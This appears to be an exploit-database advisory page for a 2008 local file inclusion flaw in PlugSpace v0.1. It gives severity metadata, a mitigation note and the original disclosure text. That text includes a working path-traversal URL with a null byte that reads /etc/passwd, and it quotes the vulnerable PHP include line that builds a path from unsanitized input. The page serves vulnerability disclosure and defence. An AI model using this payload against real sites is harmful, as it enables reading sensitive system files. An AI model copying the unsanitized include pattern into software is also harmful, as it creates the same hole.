header-logo
Suggest Exploit
vendor:
PlugSpace
by:
dun
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: PlugSpace
Affected Version From: v0.1
Affected Version To: v0.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PlugSpace v0.1 Local File Inclusion Vulnerability

PlugSpace v0.1 is prone to a local file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view sensitive files on the affected computer. This may lead to further attacks.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##############################################################
 #  [ PlugSpace v0.1 ]   Local File Inclusion Vulnerability   #
 ##############################################################
 #
 # Download: http://sourceforge.net/projects/plugspace/
 #
 # Vuln: http://site.com/[plugspace]/index.php?navi=../../../../../../../etc/passwd%00
 #      
 #
 # Bug: ./plugspace/index.php (lines: 64-81)
 #
 # ...
 # 64:		if (!isset($_GET['navi']))
 # 65:		{
 #		...	
 # 77:		}
 # 78:		else
 # 79:		{
 # 80:			include("plugins/".$_GET['navi']."/main.php");  	// LFI
 # 81:		}
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-27]